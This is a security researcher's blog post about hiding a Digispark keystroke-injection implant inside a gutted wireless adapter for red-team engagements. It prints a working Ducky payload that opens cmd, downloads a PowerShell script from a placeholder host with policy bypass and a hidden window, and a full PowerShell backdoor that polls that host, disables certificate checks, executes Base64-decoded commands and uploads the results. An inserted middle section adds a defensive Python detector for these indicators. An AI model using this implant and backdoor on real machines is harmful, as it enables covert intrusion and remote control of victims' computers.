David Sopas – Web Security Researcher

December 19, 2019 at 1:24 pm

Make HID great again

I have been using HID devices on red-team assessments at Char49 for a long time, especially the Rubber Ducky and lately the Cactus WHID.
I wanted to play a little more, so I picked one of my favourite tools from my arsenal, the tiny Digispark. This ATtiny85 board with 8 KB of flash memory has become part of most of my assessments, from dead-drops to implants.

My last implant – we can call it HID modding – was to put a Digispark inside a damaged wireless adapter. The only components I kept from the original product were the USB connector and the external case.
Before connecting everything, I built a test lab using an old USB connector and the Digispark with soldered pins.

Why? In the past I have found bad PCB prints that swapped DATA+ and DATA- (on the Digispark these are labelled USB+ and USB-), so before relying on my shitty soldering skills I created this test setup for future HID modding.

I ended up with the following schematics:

Everything was working properly so I added everything inside the Wireless Adapter and used super-glue to close the case.

Now I had a concealed HID device that I can place at a client site and have everyone believe it is just an innocent network device.

The only part missing was the code. I connected the device to the Arduino IDE and uploaded my sketch, which does the following:

  1. Download a file from my domain using PowerShell
  2. Execute the .ps1 file
  3. Get the reverse shell, which points to my VPS

Ducky payload (I used duck2spark from mame82 to convert my duck scripts to Digispark source):

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://YOUR-IP/ps.txt',\"file.ps1\")";
ENTER
DELAY 750
STRING cls
ENTER
DELAY 500
STRING powershell -W Hidden .\file.ps1
ENTER

PowerShell script:

function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}

function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}

$resp = "http://YOUR-IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);

    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}
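A detection-side counterpart to the two listings above (the Ducky payload and the polling script), added here as an example and not code from the original post or from any of the tools it mentions. It scores a few constructed log records shaped like Sysmon Event ID 1 (process creation) and PowerShell script-block logging (Event ID 4104) against the indicators this chain leaves behind: cmd.exe spawned from explorer.exe (the Win+R Run box path), `-NoP -NonI -Exec Bypass`, `WebClient.DownloadFile`, `IEX`, `-W Hidden`, certificate validation switched off, and Base64-decoded command text. The field names, the weights and the threshold are my own assumptions, not any vendor's rule format.

```python
"""Added detection example (not from the original post): scores log records shaped
like Sysmon Event ID 1 (process creation) and PowerShell script-block logging
(Event ID 4104) against the indicators left behind by the Ducky payload and the
polling script shown in the post. Field names, weights and the threshold are my
own assumptions, not a vendor rule format."""
import re

# Constructed sample records, not real telemetry. "id" is the Windows event id;
# the other keys are the fields a SIEM would expose for that event.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": ('powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient)'
                 '.DownloadFile(\'http://YOUR-IP/ps.txt\',\\"file.ps1\\")"')},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -W Hidden .\file.ps1"},
    {"id": 4104, "script": (
        "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
        "$d = [System.Convert]::FromBase64String($r_get)\n"
        "$output = invoke-expression $Ds | out-string\n"
        "$w.UploadString($resp, $output)")},
    # Benign control: an admin running a one-off command from the Start menu.
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell Get-Process"},
]

# (name, regex, weight). Weights are a rough assumed scoring, tuned so that a
# single weak indicator (a hidden window on its own) stays below the threshold.
CMDLINE_INDICATORS = [
    ("noprofile_noninteractive", re.compile(r"-NoP(?:rofile)?\b.*-NonI(?:nteractive)?\b", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-Exec(?:utionPolicy)?\s+Bypass", re.I), 2),
    ("webclient_download", re.compile(r"Net\.WebClient\)?\.Download(?:File|String)", re.I), 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("hidden_window", re.compile(r"-W(?:indowStyle)?\s+Hidden", re.I), 2),
]
SCRIPTBLOCK_INDICATORS = [
    ("tls_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I), 3),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 1),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("webclient_upload", re.compile(r"\.UploadString\(", re.I), 2),
]
SUSPICIOUS_THRESHOLD = 4


def score_event(event):
    """Return (score, [indicator names]) for one record; unknown ids score 0."""
    if event["id"] == 1:
        text, rules = event["cmdline"], CMDLINE_INDICATORS
    elif event["id"] == 4104:
        text, rules = event["script"], SCRIPTBLOCK_INDICATORS
    else:
        return 0, []
    hits = [(name, weight) for name, rx, weight in rules if rx.search(text)]
    return sum(weight for _, weight in hits), [name for name, _ in hits]


def triage(events):
    """Return [(index, score, names)] for every record at or above the threshold."""
    flagged = []
    for idx, event in enumerate(events):
        score, names = score_event(event)
        if score >= SUSPICIOUS_THRESHOLD:
            flagged.append((idx, score, names))
    return flagged


def is_keyboard_injection_chain(events):
    """True when cmd.exe launched by explorer.exe (the Run box path) is later
    followed by a suspicious powershell.exe whose parent is cmd.exe, i.e. the
    GUI r -> cmd -> powershell sequence the Ducky payload types."""
    saw_cmd_from_explorer = False
    for event in events:
        if event["id"] != 1:
            continue
        image, parent = event["image"].lower(), event["parent"].lower()
        if image.endswith("\\cmd.exe") and parent.endswith("\\explorer.exe"):
            saw_cmd_from_explorer = True
        elif (saw_cmd_from_explorer and image.endswith("\\powershell.exe")
              and parent.endswith("\\cmd.exe")
              and score_event(event)[0] >= SUSPICIOUS_THRESHOLD):
            return True
    return False


if __name__ == "__main__":
    for idx, score, names in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score} -> {', '.join(names)}")
    print("keyboard-injection chain seen:", is_keyboard_injection_chain(SAMPLE_EVENTS))
```

The per-event scores only catch the loud parts (the download one-liner and the decoded script body); the `-W Hidden .\file.ps1` launch on its own scores below the threshold, which is why the chain check keys on the parent/child sequence rather than on any single command line. Event ID 4104 records only exist if PowerShell script block logging is enabled, so that switch, together with a device-control policy that does not silently accept a new keyboard-class USB device, is what turns these indicators into something you can actually alert on.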

I created a small video for educational purposes only – find it here.

The target machine was a fresh and up-to-date Windows 10 Pro install with Windows Defender and Firewall on.

How much did it cost?

Well, the only real cost was the Digispark, which you can get on AliExpress for 1 to 3 bucks apiece.

I already have other ideas, like adding a Digispark to other “junk” from my “crappy stuff that I should recycle” pile – RC toys, USB converters, IP cameras, etc.

To conclude this post, I recently bought an Evil Crow Cable and an O.MG DemonSeed EDU, so I hope to have time to explore these devices.

To learn more about HID, you should follow these talented guys on Twitter – @mame82, @lucabongiorni and @_MG_.
I also recommend everyone watch the talk by my mate @kripthor on the steps to create UberHid.

For any feedback, feel free to ping me on Twitter – @dsopas.